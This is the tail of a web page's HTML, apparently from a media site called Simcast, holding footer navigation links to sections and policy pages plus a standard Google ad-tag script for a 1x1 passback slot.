			<a class="footerlink" href="/money">Money</a><br />
			<a class="footerlink" href="/entertainment">Entertainment</a><br />
			<a class="footerlink" href="/lifestyle">Lifestyle</a></td>
			<td style="vertical-align:top; width:33%"><a class="footerlink" href="/health">Health</a><br />
			<a class="footerlink" href="/travel">Travel</a><br />
			<a class="footerlink" href="/video">Videos</a><br />
			<a class="footerlink" href="/sports">Sports</a><br />
			<a class="footerlink" href="/lifestyle">Lifestyle</a></td>
			<td style="vertical-align:top; width:34%"><a class="footerlink" href="/about-us/About-Simcast">About Us</a><br />
			<a class="footerlink" href="/about-us/Contact-Us">Contact Us</a><br />
			<a class="footerlink" href="/about-us/policies/Privacy-Policy">Privacy Policy</a><br />
			<a class="footerlink" href="/about-us/policies/Terms-of-Use">Terms of Use</a></td>
		</tr>
	</tbody>
</table>
</div>            </div>
<div id="gpt-passback">
  <script>
    window.googletag = window.googletag || {cmd: []};
    googletag.cmd.push(function() {
    googletag.defineSlot('/51855962/test/Traffic_1x1', [1, 1], 'gpt-passback').addService(googletag.pubads());
    googletag.enableServices();
    googletag.display('gpt-passback');
    });
  </script>
</div>
        </div>
    </body>
</html>

